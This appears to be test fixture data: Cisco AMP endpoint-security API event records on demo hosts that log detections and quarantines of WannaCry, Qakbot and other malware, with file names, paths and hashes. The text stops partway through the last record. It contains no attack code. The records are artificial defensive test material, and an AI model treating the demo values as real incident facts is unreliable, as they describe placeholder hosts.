+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1458626002840536600,"timestamp":1610627243,"timestamp_nanoseconds":268148295,"date":"2021-01-14T12:27:23+00:00","event_type":"Threat Detected in Low Prevalence Executable","event_type_id":1107296278,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583861114428195000,"timestamp":1610626750,"timestamp_nanoseconds":161000000,"date":"2021-01-14T12:19:10+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264747552596296000,"timestamp":1610626264,"timestamp_nanoseconds":27000000,"date":"2021-01-14T12:11:04+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b","sha1":"5058b16a86beee96927371210b9a9f682976a50a","md5":"48a0bf05b9706a00d2a0ff6260412f11"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411444887895409000,"timestamp":1610625778,"timestamp_nanoseconds":756000000,"date":"2021-01-14T12:02:58+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Auto.A280012EEE.in10.tht.Talos","detection_id":"6411444887895408641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_2","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d1:e2:b6:61:ef:7a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"X4.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\X4.exe","identity":{"sha256":"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62","sha1":"c235e18bae63d6c4b5daadb833686f943de65a5f","md5":"a659ff79ef7ffacbd61d4c2641379e44"},"parent":{"process_id":4744,"disposition":"Clean","file_name":"wscript.exe","identity":{"sha256":"9c8a1b52a638ca87a5e7e60e635a3cbf89b04f5888995f55e2ad3d94ab009b97","sha1":"2131cff0959d213cd9a5e8a8ac362d265d5b1316","md5":"045451fa238a75305cc26ac982472367"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411444887895409000,"timestamp":1610625778,"timestamp_nanoseconds":772000000,"date":"2021-01-14T12:02:58+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6411444887895408641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_2","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d1:e2:b6:61:ef:7a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187549993959000,"timestamp":1610625537,"timestamp_nanoseconds":208000000,"date":"2021-01-14T11:58:57+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419187549993959449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187549993959000,"timestamp":1610625537,"timestamp_nanoseconds":193000000,"date":"2021-01-14T11:58:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419187549993959449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":2980,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187537109058000,"timestamp":1610625534,"timestamp_nanoseconds":853000000,"date":"2021-01-14T11:58:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419187537109057560","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":2980,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187537109058000,"timestamp":1610625534,"timestamp_nanoseconds":884000000,"date":"2021-01-14T11:58:54+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419187537109057560","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583853374897127000,"timestamp":1610624948,"timestamp_nanoseconds":562000000,"date":"2021-01-14T11:49:08+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945825043963,"timestamp":1610624472,"timestamp_nanoseconds":496121997,"date":"2021-01-14T11:41:12+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.ED01EBFBC9-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610624472,"start_date":"2021-01-14T11:41:12+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945825043964,"timestamp":1610624472,"timestamp_nanoseconds":498576872,"date":"2021-01-14T11:41:12+00:00","event_type":"Multiple Infected Files","event_type_id":1107296258,"detection":"W32.ED01EBFBC9-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610624472,"start_date":"2021-01-14T11:41:12+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533671599780921000,"timestamp":1610623726,"timestamp_nanoseconds":440000000,"date":"2021-01-14T11:28:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6533671595485954049","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533671595485954000,"timestamp":1610623725,"timestamp_nanoseconds":899000000,"date":"2021-01-14T11:28:45+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.FCE5B6784D-100.SBX.TG","detection_id":"6533671595485954049","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"pp32.exe","file_path":"\\\\?\\C:\\pp32.exe","identity":{"sha256":"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79","sha1":"bdb11107a33eaeded6a838eb2a0e6167637dbe9c","md5":"5df0c4ebca109779dc8afc745d612637"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179222052372000,"timestamp":1610623598,"timestamp_nanoseconds":453000000,"date":"2021-01-14T11:26:38+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179222052372503","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179222052372000,"timestamp":1610623598,"timestamp_nanoseconds":437000000,"date":"2021-01-14T11:26:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179222052372503","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":875000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405206","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":361000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179213462437901","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179204872503300","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":797000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405206","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419179204872503301","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":893000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437902","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":456000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437899","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":643000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat 